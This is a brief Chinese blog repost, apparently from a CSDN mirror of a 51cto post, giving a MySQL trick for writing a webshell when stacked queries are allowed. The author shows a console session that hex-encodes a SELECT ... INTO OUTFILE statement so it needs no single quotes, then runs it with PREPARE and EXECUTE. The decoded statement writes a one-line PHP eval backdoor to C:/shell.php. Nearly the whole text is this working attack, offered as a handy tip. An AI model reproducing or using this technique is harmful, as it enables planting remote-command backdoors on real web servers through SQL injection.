可多语句执行下不用单引号outfile写shell

最新推荐文章于 2024-02-27 19:52:31 发布

weixin_33920401

最新推荐文章于 2024-02-27 19:52:31 发布

阅读量188

点赞数

文章标签： shell 数据库

原文链接：http://blog.51cto.com/obnus/438290

版权

基本没太大用处，不过说不定能用上，Note一下,呵呵。

mysql> use xssdb;
Database changed

mysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332
38323435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
Query OK, 0 rows affected (0.00 sec)

mysql> prepare cmd from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

mysql> execute cmd;
Query OK, 1 row affected (0.00 sec)

上面加密的十六进制是：

‍select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'

转载于:https://blog.51cto.com/obnus/438290

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33920401

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
可多语句执行下不用单引号outfile写shell

基本没太大用处，不过说不定能用上，Note一下,呵呵。mysql> use xssdb;Database changedmysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332383234354635303446353335343542323...
复制链接

扫一扫